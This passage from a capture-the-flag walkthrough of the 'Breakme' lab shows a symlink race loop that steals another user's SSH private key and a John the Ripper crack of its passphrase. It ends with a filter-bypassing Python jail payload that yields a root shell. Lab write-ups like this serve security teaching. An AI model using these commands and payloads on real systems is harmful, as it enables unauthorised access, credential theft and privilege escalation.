The application first checks if an argument is supplied, otherwise it exits with a usage message. It then verifies if the file exists, exits if it doesn't, and ensures the user is running with UID 1002 (john). If the filename contains flag or id_rsa, or is a symlink, access is denied. However, if the file passes these checks, the program waits briefly (usleep) before opening and printing the file. This delay introduces a race condition, allowing exploitation between the file check and access (TOCTOU vulnerability).
Race Condition
To exploit the race condition vulnerability, we can create a regular file and rapidly toggle it between a regular file and a symlink pointing to the desired file (e.g., youcef’s file). The goal is that during the application's check, it detects the regular file and allows access. But by the time the program opens and reads the file, the symlink points to the target file we wish to access, bypassing the restrictions.
For this, we will first use a loop to constantly switch the file between these two states and run it in the background.
while true; do ln -sf /home/youcef/.ssh/id_rsa symlink; rm symlink; touch symlink; done &
Now, we will create another loop that continuously runs the program, hoping to win the race condition. If we succeed, it will print the output and exit.
for i in {1..30}; do /home/youcef/readfile symlink; done
As we can see, after a while, we win the race and manage to read /home/youcef/.ssh/id_rsa.
SSH Connection
Now that we have the SSH key, we encounter an additional obstacle: the key is encrypted with a passphrase. To gain access, we will need to crack or bypass this passphrase in order to use the SSH key and establish a shell on the target system.
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa':
We can attempt to brute-force the passphrase. First, we need to convert the SSH key into a format that John the Ripper can work with.
$ ssh2john id_rsa > ssh_key.hash
We do this using the ssh2john utility, which transforms the SSH private key into a hash that John the Ripper can recognize and attempt to crack.
After converting the key, we can run John to start brute-forcing the passphrase and potentially gain access to the decrypted SSH key.
Now, using john to crack it, we obtain the passphrase.
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ john ssh_key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 0.00% (ETA: 2024-10-10 21:56) 0g/s 53.50p/s 53.50c/s 53.50C/s cancer..michael1
[REDACTED] (id_rsa)
1g 0:00:00:12 DONE (2024-10-07 16:28) 0.07782g/s 52.29p/s 52.29c/s 52.29C/s gracie..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Using the SSH key and the passphrase we found, we successfully access the system as the user "youcef."
With this shell access, we can now explore the system further and locate the second flag.
By having control over the "youcef" account, we can read files and execute commands under this user, allowing us to progress further in the challenge.
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa':
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 21 07:55:16 2024 from 192.168.56.1
youcef@Breakme:~$ id
uid=1000(youcef) gid=1000(youcef) groups=1000(youcef)
This gives us our 2nd flag.
Privilege Escalation
youcef@Breakme:~$ sudo -l
Matching Defaults entries for youcef on breakme:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User youcef may run the following commands on breakme:
(root) NOPASSWD: /usr/bin/python3 /root/jail.py
Executing the program reveals that we are operating within a Python jail, which prompts us for input.
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
Welcome to Python jail
Will you stay locked forever
Or will you BreakMe
>>
Upon testing the input, we discover that entering invalid Python code triggers a "Wrong Input" message. .
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
Welcome to Python jail
Will you stay locked forever
Or will you BreakMe
>> test
Wrong Input
>>
When we input valid Python code, it executes successfully, indicating that our input is likely being passed directly to the exec function.
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
Welcome to Python jail
Will you stay locked forever
Or will you BreakMe
>> test
Wrong Input
>> print(hello)
Wrong Input
>> print('hello')
hello
>>
However, if we try to import a module to run commands, we see the message Illegal Input and the program exits. This indicates that there must be some filtering in place.
>> import os
Illegal Input
youcef@Breakme:~$
Since directly spawning a shell or utilizing typical programs for this purpose is restricted, we should explore alternative methods to gain shell access. We might consider leveraging scripting techniques, utilizing file redirection, or finding executables that allow indirect access. Exploring environment variables or existing permissions could also present opportunities for executing commands that would lead to a shell.
Looking for common Python jail bypass payloads, we find the following payload here. It imports the os module and calls the system function from it:
__builtins__.__import__("os").system("ls")
But, if we try it in our case, we see that it fails.
To begin our exploration, we first attempt to access the import function using __builtins__.__import__. However, we quickly discover that this functionality is restricted.
>> __builtins__.__import__
Illegal Input
By breaking down our payload and testing its individual components, we determine that the problem originates from the __import__ function and the quotation marks.
To bypass the issue with quotation marks, we can use single quotes (').
For the __import__ function, instead of calling it directly as __builtins__.__import__, we can access it through the dictionary method with __builtins__.__dict__['__import__'].
This approach allows us to provide __import__ as a string, which we can manipulate using various string methods to circumvent filters. For instance, the application accepts __IMPORT__, enabling us to modify it to __import__.
For instance, we see that the application has no issue with __IMPORT__.
>> __IMPORT__
Wrong Input
We can utilize __IMPORT__ and then apply a method to convert it to __import__. One method we can use is lower(), which transforms all uppercase letters into lowercase.
Looking for alternatives to the lower method, we find the casefold method, which serves a similar purpose. As we can see, this method is not filtered and works.
>> print(__builtins__.__dict__['__IMPORT__'.casefold()])
<built-in function __import__>
Returning to our payload, we find that when we attempt to import the os module, it is also not allowed, and we can see the reason why: os is filtered as well.
>> __builtins__.__dict__['__IMPORT__'.casefold()]('os')
Illegal Input
>> os
Illegal Input
Since os is already supplied as a string and OS is not filtered, we can use the casefold method once more to bypass it.
As we can see, this works, and we are able to access the os module
>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()))
<module 'os' from '/usr/lib/python3.9/os.py'>
However, if we try to access the system function, we find that we fail once more.
Now, we can use __dict__ once more to be able to use system as a string and apply the casefold method to bypass the filter.
As we can see, this allows us to access the system function successfully.
>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()])
<built-in function system>
By using the payload __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick'), we can spawn the Yorick interpreter. Once inside the Yorick environment, we can execute the command system "bash" to launch a shell as the root user. This allows us to access and read the third flag, leveraging the vulnerabilities in the Python execution context.
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
Welcome to Python jail
Will you stay locked forever
Or will you BreakMe
>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick')
Copyright (c) 2005. The Regents of the University of California.
All rights reserved. Yorick 2.2.04 ready. For help type 'help'
> system, "bash"
root@Breakme:/home/youcef# cd ~
root@Breakme:~# id
uid=0(root) gid=0(root) groups=0(root)